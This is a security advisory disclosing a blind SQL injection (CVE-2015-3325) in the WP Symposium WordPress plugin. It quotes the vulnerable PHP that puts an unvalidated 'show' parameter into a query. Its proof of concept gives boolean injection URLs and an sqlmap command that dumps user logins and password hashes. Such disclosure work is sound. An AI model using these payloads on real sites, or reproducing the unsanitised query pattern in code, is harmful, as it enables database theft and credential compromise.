======================================================================= title: SQL Injection product: WordPress WP Symposium Plugin vulnerable version: 15.1 (and probably below) fixed version: 15.4 CVE number: CVE-2015-3325 impact: CVSS Base Score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) homepage: https://wordpress.org/plugins/wp-symposium/ found: 2015-02-07 by: Hannes Trunde mail: hannes.trunde@gmail.com twitter: @hannestrunde ======================================================================= Plugin description: ------------------- "WP Symposium turns a WordPress website into a Social Network! It is a WordPress plugin that provides a forum, activity (similar to Facebook wall), member directory, private mail, notification panel, chat windows, profile page, social widgets, activity alerts, RSS activity feeds, Groups, Events, Gallery, Facebook Connect and Mobile support! You simply choose which you want to activate! Certain features are optional to members to protect their privacy." Source: https://wordpress.org/plugins/wp-symposium/ Recommendation: --------------- The author has provided a fixed plugin version which should be installed immediately. Vulnerability overview/description: ----------------------------------- Because of insufficient input validation, a blind sql injection attack can be performed within the forum feature to obtain sensitive information from the database. The vulnerable code sections are described below. forum.php lines 59-62: =============================================================================== if ( ( $topic_id == '' && $cat_id == '') || ( !$cat_id != '' && get_option(WPS_OPTIONS_PREFIX.'_forum_ajax') && !get_option(WPS_OPTIONS_PREFIX.'_permalink_structure') ) ) { $cat_id = isset($_GET['cid']) ? $_GET['cid'] : 0; $topic_id = isset($_GET['show']) ? $_GET['show'] : 0; // GET PARAMETER IS ASSIGNED TO $topic_id VARIABLE } =============================================================================== forum.php lines 95-103: =============================================================================== if ( get_option(WPS_OPTIONS_PREFIX.'_permalink_structure') || !get_option(WPS_OPTIONS_PREFIX.'_forum_ajax') ) { if ($topic_id == 0) { $forum = __wps__getForum($cat_id); if (($x = strpos($forum, '[|]')) !== FALSE) $forum = substr($forum, $x+3); $html .= $forum; } else { $html .= __wps__getTopic($topic_id); // __wps__getTopic IS CALLED WITH $topic_id AS PARAMETER } } =============================================================================== functions.php lines 152-155: =============================================================================== $post = $wpdb->get_row(" SELECT tid, topic_subject, topic_approved, topic_category, topic_post, topic_started, display_name, topic_sticky, topic_owner, for_info FROM ".$wpdb->prefix."symposium_topics t INNER JOIN ".$wpdb->base_prefix."users u ON t.topic_owner = u.ID WHERE (t.topic_approved = 'on' OR t.topic_owner = ".$current_user->ID.") AND tid = ".$topic_id); //UNVALIDATED $topic_id IS USED IN SQL QUERY =============================================================================== Proof of concept: ----------------- The following HTTP request to the forum page returns the topic with id 1: =============================================================================== http://www.site.com/?page_id=4&cid=1&show=1 AND 1=1 =============================================================================== The following HTTP request to the forum page returns a blank page, thus confirming the blind SQL injection vulnerability: =============================================================================== http://www.site.com/?page_id=4&cid=1&show=1 AND 1=0 =============================================================================== Obtaining users and password hashes with sqlmap may look as follows: ================================================================================ sqlmap -u "http://www.site.com/?page_id=4&cid=1&show=1" -p "show" --technique=B --dbms=mysql --sql-query="select user_login,user_pass from wp_users" ================================================================================ Contact timeline: ------------------------ 2015-04-08: Contacting author via mail. 2015-04-13: Mail from author, confirming the vulnerability. 2015-04-14: Requesting CVE via post to the open source software security mailing list: http://openwall.com/lists/oss-security/2015/04/14/5 2015-04-15: Mail from author, stating that updated plugin version will be available in the next few days. 2015-05-05: Mail from author, stating that fixed version has been uploaded and should be available soon. 2015-05-07: Confirming that update is available, releasing security advisory Solution: --------- Update to the most recent plugin version. Workaround: ----------- See solution.